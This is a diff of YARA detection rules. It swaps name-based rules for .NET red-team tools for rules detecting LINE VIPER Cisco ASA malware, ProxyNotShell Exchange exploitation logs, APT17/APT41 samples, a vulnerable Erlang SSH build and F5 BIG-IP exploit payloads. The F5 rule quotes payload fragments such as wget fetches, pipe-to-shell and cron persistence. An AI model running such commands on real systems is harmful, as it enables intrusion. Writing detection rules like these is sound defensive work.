-		$compile = "AssemblyTitle" ascii wide
+		$xc1 = {
+         48 8D B7 80 00 00 00 BA 00 20 00 00 [19] 48 C7 C6 00
+         90 00 00 BA 07 00 00 00
+      }
+		$xe1 = { 53 49 32 33 67 41 41 41 41 4c 6f 41 49 41 41 41 [26] 6a 48 78 67 43 51 41 41 43 36 42 77 41 41 41 }
+		$xe2 = { 69 4e 74 34 41 41 41 41 43 36 41 43 41 41 41 [26] 49 78 38 59 41 6b 41 41 41 75 67 63 41 41 41 }
+		$xe3 = { 49 6a 62 65 41 41 41 41 41 75 67 41 67 41 41 [26] 53 4d 66 47 41 4a 41 41 41 4c 6f 48 41 41 41 41 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Infrastructure_Assessment : FILE
+rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_RSA_Enc_Random_AES_Key_Gen
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "efacc12b-92b3-5b22-b5bb-cd5a7d7eea0e"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/NyaMeeEain/Infrastructure-Assessment"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L601-L614"
+		description = "Detects LINE VIPER Cisco ASA malware code as part of RSA encrypted random AES key generation."
+		author = "NCSC"
+		id = "93c11d59-6f1c-585f-9807-a9df7cad2917"
+		date = "2025-09-25"
+		modified = "2025-09-27"
+		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L119-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7b2f1481c2880b5b3ee158f2a526ab7fc5e587bbf3847ebe9ddf447742109a78"
-		score = 75
+		logic_hash = "c382158e21300f49ed3da58e3e02c4578c10fd854c87a18227a01b7d6f7723bc"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$name = "Infrastructure-Assessment" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$xc1 = {
+         48 31 C0 49 89 06 49 89 46 08 49 83 C6 10 49 83 ED 10
+         4D 85 ED 75 D8 BF 30 00 00 00
+      }
+		$xc2 = {
+         0F 85 57 01 00 00 49 8B 44 24 08 48 83 F8 2F 7C 33 41
+         BD F0 02 00 00 4D 8D 74 24 10 49 8B 3E
+      }
+		$xc3 = {
+         85 C0 0F 8E EE 00 00 00 41 BD F0 02 00 00 4D 8D 7C 24
+         10 49 8B 3F 48 85 FF 74 0D 49 83 C7 10 49 83 ED 10 4D 85 ED 75 EB
+         4D 89 37 BF 70 00 00 00
+      }
+		$xc4 = {
+         48 85 C0 0F 84 3F 00 00 00 48 89 45 B0 BF 80 00 00 00
+         4C 89 EE 48 89 C2 48 8B 4D A8 41 B8 01 00 00 00
+      }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Shellcodetester : FILE
+rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_AES_Enc_Tasking_Exfil
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "964093a4-e6d7-51b7-928a-b1cd40dc11cc"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/tophertimzen/shellcodeTester"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L616-L629"
+		description = "Detects LINE VIPER Cisco ASA malware code as part of AES encrypted tasking and exfiltration."
+		author = "NCSC"
+		id = "969ebeb6-a9fe-57b3-a60a-ac2611f2afca"
+		date = "2025-09-25"
+		modified = "2025-09-27"
+		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L149-L177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3101b62428eba5e36572a190bd3a11f59cf9cca10aec3cfe3000028f1b1f0a3f"
-		score = 50
+		logic_hash = "b6181701b512709c812f303a33e13115bb52f28be7095c086ef2a3b17f6ef4fd"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$name = "shellcodeTester" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$ = {
+         48 31 C0 48 89 45 D8 49 89 FC 49 89 F5 49 89 D6 48 8B
+         47 08 48 89 45 B8 48 8D 40 40 48 89 45 E0 48 8D 70 E0 48 89 75 B0
+         48 8D 78 F0 48 89 7D E8 BA 10 00 00 00
+      }
+		$ = {
+         48 85 C0 0F 84 EA 00 00 00 48 89 45 A8 4C 89 EF 48 89
+         C6 4C 89 F2 48 8B 4D A0 4C 8B 45 B0 4D 31 C9
+      }
+		$ = {
+         48 85 C0 0F 84 82 00 00 00 49 89 C7 48 8B 7D E0 BE 00
+         01 00 00 48 8B 55 A0
+      }
+		$ = {
+         48 8B 7D D0 49 83 C7 10 49 C1 EF 04 49 C1 E7 04 4C 89
+         FE 48 8D 55 D8
+      }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Gray_Hat_Csharp_Code : FILE
+rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_ICMP_Tasking_Shellcode_Payloads
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "0a94cadc-cc7b-5817-8788-bb1e53937fad"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/brandonprry/gray_hat_csharp_code"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L631-L644"
+		description = "Detects LINE VIPER Cisco ASA malware code as part of ICMP tasking shellcode payloads."
+		author = "NCSC"
+		id = "4a0db4a2-bb78-5cb6-aa12-2f2ebc86077c"
+		date = "2025-09-25"
+		modified = "2025-09-27"
+		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L179-L208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4520528cd6b1832c97fa79442f9d448d54bad4e6944984fa6e71f34246259e28"
-		score = 75
+		logic_hash = "a11d8cebae498340065244ddaf6863925ef8368cea20af1d1f21c46fc51280ee"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$name = "gray_hat_csharp_code" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$ = {
+         55 53 41 54 41 55 41 56 41 57 48 89 E5 48 83 EC 60 48
+         31 C0 B9 07 00 00 00 48 8D 7D A8 F3 48 AB BF 01 00 00
+         00 BE 30 00 00 00
+      }
+		$ = {
+         49 89 C7 48 C7 C2 38 DF FF FF 64 48 8B 0A 48 8B 99 00
+         01 00 00 48 89 81 00 01 00 00
+      }
+		$ = {
+         49 8B 47 10 48 8D 55 B0 BE 01 20 01 00 4C 89 FF FF 90
+         90 00 00 00 48 8B 7D B0 48 85 FF 0F 84 3C 00 00 00
+      }
+		$ = {
+         49 8B 47 10 BE 08 20 01 00 4C 89 FF 48 8D 55 A8 FF 90
+         90 00 00 00 48 8B 7D B0 49 89 7E 20 48 8B 7D A8 49 89
+         7E 28
+      }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_Reverseshell : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_1 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "eec77c09-02db-5d74-8526-e201d2fe6fc8"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_ReverseShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L646-L659"
+		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a61f6582-474f-5b6f-b8f5-329c0bcc4017"
+		date = "2022-12-22"
+		modified = "2023-12-05"
+		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxynotshell_owassrf_dec22.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "79ebde95674d76e58938b06a97cb6c65e6ac0606398fc9c30d90e517bbdd62a8"
-		score = 75
+		logic_hash = "1e8f5a3440f8b4b1850fddbd19f63796ad0f28178c678e9f464b7e4ab5ca944f"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$name = "NativePayload_ReverseShell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "/owa/mastermailbox%40outlook.com/powershell" ascii wide
+		$sa1 = " 200 " ascii wide
+		$sa2 = " POST " ascii wide
+		$fp1 = "ClientInfo" ascii wide fullword
+		$fp2 = "Microsoft WinRM Client" ascii wide fullword
+		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		all of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Dotnetavbypass : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_2 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "918eba2b-150d-5e69-bed0-0979ae889165"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/mandreko/DotNetAVBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L661-L674"
+		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+		author = "Florian Roth (Nextron Systems)"
+		id = "85722997-fd28-51cf-817e-7a314e284b0b"
+		date = "2022-12-22"
+		modified = "2023-12-05"
+		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxynotshell_owassrf_dec22.yar#L24-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "574a5f1bc1873321042e932ddfd53853e8e06dff3b25f2ad41e6b8aaf150a8b2"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "73ce86b7a673719c916666fa06963b774edad5b2cd804994614afd83ea75ecef"
+		score = 60
+		quality = 60
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$name = "DotNetAVBypass" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$sr1 = / \/owa\/[^\/\s]{1,30}(%40|@)[^\/\s\.]{1,30}\.[^\/\s]{2,3}\/powershell / ascii wide
+		$sa1 = " 200 " ascii wide
+		$sa2 = " POST " ascii wide
+		$fp1 = "ClientInfo" ascii wide fullword
+		$fp2 = "Microsoft WinRM Client" ascii wide fullword
+		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		all of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Hexyrunner : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_3 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "67741b4d-7336-5c88-8f2c-e48c10b187b9"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/bao7uo/HexyRunner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L676-L689"
+		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+		author = "Florian Roth (Nextron Systems)"
+		id = "76dd786e-daaa-5cd9-8e3e-50d9eab7f9d2"
+		date = "2022-12-22"
+		modified = "2023-12-05"
+		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxynotshell_owassrf_dec22.yar#L47-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c55be1fe285358378a98fd1027650dd20dd8cd0aad4dc062df7a0d4538c78c3b"
-		score = 75
+		logic_hash = "607d3743a46e0c5000b9c7847dd89f5d7ccf29f4f1af9bce6870d7738f071f5c"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$name = "HexyRunner" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$sa1 = " POST /powershell - 444 " ascii wide
+		$sa2 = " POST /Powershell - 444 " ascii wide
+		$sb1 = " - 200 0 0 2" ascii wide
+		$fp1 = "ClientInfo" ascii wide fullword
+		$fp2 = "Microsoft WinRM Client" ascii wide fullword
+		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		1 of ( $sa* ) and $sb1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpoffensiveshell : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_Powershell_Proxy_Log_Dec22_1 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "f223fb95-9f16-5504-a6ce-de9d75b38eaa"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/darkr4y/SharpOffensiveShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L691-L704"
+		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5af3ae70-8897-593f-a413-82ca1d1ba961"
+		date = "2022-12-22"
+		modified = "2023-01-26"
+		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxynotshell_owassrf_dec22.yar#L68-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "36bcae7817eed375e48822a49e6875295ea1037217231a7f9ae88a9b8af95530"
-		score = 75
+		logic_hash = "f2aac61bc17f74901ec8d638d5cfaaa45bbd2a4e40e5d915bf2a946daed411d2"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$name = "SharpOffensiveShell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$re1 = /,\/[Pp][Oo][Ww][Ee][Rr][Ss][Hh][Ee][Ll][Ll][^\n]{0,50},Kerberos,true,[^\n]{0,50},200,0,,,,[^\n]{0,2000};OnEndRequest\.End\.ContentType=application\/soap\+xml charset UTF-8;S:ServiceCommonMetadata\.HttpMethod=POST;/ ascii wide
+		$fp1 = "ClientInfo" ascii wide fullword
+		$fp2 = "Microsoft WinRM Client" ascii wide fullword
+		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		$re1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Reconness : FILE
+rule SIGNATURE_BASE_SUSP_LNK_Big_Link_File : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "a30188e4-d96a-59d0-9f51-d7a7e07b14ba"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/reconness/reconness"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L706-L719"
+		description = "Detects a suspiciously big LNK file - maybe with embedded content"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e130f213-53fc-56d6-b1d5-0508a7e18e61"
+		date = "2018-05-15"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_lnk.yar#L2-L12"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9cb7a3522bada1c724999058ec4ddfde09b22166f8fb3ba184dfe6bec276cfc5"
-		score = 75
+		logic_hash = "6e44483583249939494e76f14b022e698ba59dfe8b58133a69135144ef60c743"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$name = "reconness" ascii wide
-		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize > 200KB
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Tvasion : FILE
+rule SIGNATURE_BASE_APT17_Sample_FXSST_DLL : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "324cddc6-36d9-5670-827e-24e80dcc66a9"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/loadenmb/tvasion"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L721-L734"
+		description = "Detects Samples related to APT17 activity - file FXSST.DLL"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e4b9b25e-8895-5ba5-b706-bfb6892c16ae"
+		date = "2015-05-14"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/ZiJyQv"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_malware.yar#L10-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b6262f751cbb85e702d89e7c5b4efdc8eaf3085101cd7685218ab1e8a2599385"
+		hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"
+		logic_hash = "51d6da6c3ec46dc9e991a6a36de6d79626f1859296cda65e9027951c13aa4cd5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "tvasion" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$x1 = "Microsoft? Windows? Operating System" fullword wide
+		$x2 = "fxsst.dll" fullword ascii
+		$y1 = "DllRegisterServer" fullword ascii
+		$y2 = ".cSV" fullword ascii
+		$s1 = "GetLastActivePopup"
+		$s2 = "Sleep"
+		$s3 = "GetModuleFileName"
+		$s4 = "VirtualProtect"
+		$s5 = "HeapAlloc"
+		$s6 = "GetProcessHeap"
+		$s7 = "GetCommandLine"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( all of ( $x* ) or all of ( $y* ) ) and all of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Ibombshell : FILE
+rule SIGNATURE_BASE_VULN_Erlang_OTP_SSH_CVE_2025_32433_Apr25 : CVE_2025_32433 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "02f3272f-8e75-5df4-9052-a315ae202050"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Telefonica/ibombshell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L736-L749"
+		description = "Detects binaries vulnerable to CVE-2025-32433 in Erlang/OTP SSH"
+		author = "Pierre-Henri Pezier, Florian Roth"
+		id = "2a149d28-9dba-546d-abfe-79c0ced34b12"
+		date = "2025-04-18"
+		modified = "2025-04-28"
+		reference = "https://www.upwind.io/feed/cve-2025-32433-critical-erlang-otp-ssh-vulnerability-cvss-10"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_erlang_otp_ssh_cve_2025_32433.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "30de65328e2e2230eca3a30490e20c2c6d8ac9bdc835ee15d44300a00b801921"
-		score = 75
+		logic_hash = "77d23956bd467a6eb56a91fa7a4bd939873363cd101a9d21b5b298c7b2e6c1ec"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2025-32433, FILE"
 
 	strings:
-		$name = "ibombshell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$a1 = { 46 4F 52 31 ?? ?? ?? ?? 42 45 41 4D }
+		$s1 = "ssh_connection.erl"
+		$fix1 = "chars_limit"
+		$fix2 = "allow    macro_log"
+		$fix3 = "logger"
+		$fix4 = "max_log_item_len"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		filesize < 1MB and $a1 at 0 and $s1 and not 1 of ( $fix* )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Remoteprocessinjection : FILE
+rule SIGNATURE_BASE_MAL_Payload_F5_BIG_IP_Exploitations_Jul20_1 : CVE_2020_5902 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "f1698cf2-211a-551a-8bc4-4faefcc6106f"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Mr-Un1k0d3r/RemoteProcessInjection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L751-L764"
+		description = "Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "57705ba1-c0ad-5ca6-8539-44d9da6b5942"
+		date = "2020-06-07"
+		modified = "2023-12-05"
+		reference = "https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_f5_bigip_expl_payloads.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87d803c361462877f5ebba2a70f611c95b8684fe9f9f747ccf9643fc4e97d9df"
+		logic_hash = "a3651081bb09452d80cba9f673a7b61c8ee2f47a12fb64d975eb63867688ee3b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2020-5902, FILE"
 
 	strings:
-		$name = "RemoteProcessInjection" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$x1 = "rm -f /etc/ld.so.preload" ascii fullword
+		$x2 = "echo \"* * * * * $LDR" ascii
+		$x3 = ".sh -o /tmp/in.sh" ascii
+		$x4 = "chmod a+x /etc/.modules/.tmp" ascii
+		$x5 = "chmod +x /var/log/F5-logcheck"
+		$s1 = "ulimit -n 65535" ascii fullword
+		$s2 = "-s /usr/bin/wget " ascii
+		$s3 = ".sh | sh" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		filesize < 300KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_CACTUSTORCH : FILE
+rule SIGNATURE_BASE_APT_APT41_POISONPLUG_3 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "7b1e3015-fada-592c-b120-20aa12247d32"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/mdsecactivebreach/CACTUSTORCH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L766-L779"
+		description = "Detects APT41 malware POISONPLUG"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
+		date = "2019-08-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L14-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51a125a44b5d1e73509bcd29865b26f44a5ee53f6907ee9abffa3eef1bbbdea8"
-		score = 75
+		logic_hash = "b74b89ac382b2b839c169cd1388d86888172f133091afd079ec42c9380935fdc"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "70c03ce5c80aca2d35a5555b0532eedede24d4cc6bdb32a2c8f7e630bba5f26e"
 
 	strings:
-		$name = "CACTUSTORCH" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "Rundll32.exe \"%s\", DisPlay 64" fullword ascii
+		$s2 = "tcpview.exe" fullword ascii
+		$s3 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" fullword ascii
+		$s4 = "AxEeulaVteSgeR" fullword ascii
+		$s5 = "%04d-%02d-%02d_%02d-%02d-%02d.dmp" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Pandasniper : FILE
+
+rule SIGNATURE_BASE_APT_APT41_POISONPLUG_SHADOW : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "006400fb-7e6d-563b-ba78-17937983c9ba"
-		date = "2021-01-22"
-		modified = "2024-12-10"
